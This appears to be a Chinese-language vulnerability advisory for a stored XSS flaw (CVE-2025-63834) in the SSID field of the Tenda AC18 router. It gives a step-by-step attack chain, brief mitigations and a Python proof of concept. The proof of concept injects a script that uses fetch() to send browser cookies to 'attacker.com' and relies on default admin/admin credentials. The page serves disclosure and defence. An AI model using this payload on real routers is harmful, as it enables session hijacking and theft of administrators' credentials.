CVE-2025-63834 CVSS 5.4 中危

Tenda AC18路由器无线设置ssid参数存储型XSS漏洞

披露日期: 2025-11-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-63834

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Tenda AC18 v15.03.05.05_multi

漏洞概述

Tenda AC18 v15.03.05.05_multi路由器存在一处存储型跨站脚本（Stored XSS）漏洞。该漏洞位于无线设置功能的SSID参数中，攻击者可以通过该参数注入恶意JavaScript代码。由于漏洞属于存储型，当恶意代码被保存到设备配置后，所有访问该路由器主页的用户都会触发该恶意脚本。攻击者可以利用此漏洞窃取用户cookie、劫持会话、进行钓鱼攻击或在用户界面中嵌入恶意内容。此漏洞的攻击复杂度较低，但需要低权限认证，且需要诱导用户访问相关页面。由于该路由器通常用于家庭和小型办公环境，攻击成功可能导致大量用户的敏感信息泄露风险。

技术细节

该漏洞存在于Tenda AC18路由器的无线网络配置模块中。具体来说，当用户配置无线网络名称（SSID）时，系统未对用户输入进行充分的输入验证和输出编码。攻击者可以通过HTTP请求将恶意脚本作为SSID值提交，例如使用<script>alert(document.cookie)</script>这样的载荷。由于系统直接将该值存储在配置中且在后续页面渲染时未进行适当转义，当其他用户访问路由器管理界面或连接该无线网络时，恶意脚本会在用户浏览器中执行。漏洞的利用需要攻击者具有路由器的低权限访问权限，可以通过CSRF或直接认证后利用。此漏洞的CVSS评分5.4反映了其通过网络远程利用、需要低权限、但需要用户交互的特点。

攻击链分析

STEP 1

步骤1

攻击者通过暴力破解或默认凭证获取路由器管理员账号登录权限

STEP 2

步骤2

攻击者构造恶意XSS载荷，如<script>alert(document.cookie)</script>

STEP 3

步骤3

攻击者将恶意载荷作为SSID参数值通过HTTP请求提交到/goform/wireless/save接口

STEP 4

步骤4

路由器将恶意SSID值未经充分过滤直接存储在配置文件中

STEP 5

步骤5

受害者访问路由器管理界面或主页时，浏览器解析并执行存储的恶意脚本

STEP 6

步骤6

恶意脚本窃取用户cookie、会话令牌或其他敏感信息并发送给攻击者

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-63834 PoC - Tenda AC18 Stored XSS in SSID parameter
# Target: Tenda AC18 router with firmware v15.03.05.05_multi

target_ip = "192.168.0.1"  # Default Tenda router IP
router_url = f"http://{target_ip}"

# XSS payload - steals cookies
xss_payload = '<script>fetch("http://attacker.com/steal?c="+document.cookie)</script>'

# Login first
login_data = {
    "username": "admin",
    "password": "admin"  # Default credentials
}

session = requests.Session()
# session.post(f"{router_url}/login", data=login_data)

# Inject XSS payload into SSID parameter
wireless_config = {
    "ssid": xss_payload,
    "security_mode": "WPA2",
    "password": "12345678"
}

# Submit the malicious SSID
# response = session.post(f"{router_url}/goform/wireless/save", data=wireless_config)

print("XSS payload injected into SSID parameter")
print("Payload:", xss_payload)
print("When users visit the router homepage, the script will execute")

影响范围

Tenda AC18 v15.03.05.05_multi

防御指南

临时缓解措施

暂时禁用路由器的无线网络配置功能的远程访问，限制对管理界面的访问IP范围，使用强密码替代默认凭证，监控路由器日志中的异常请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表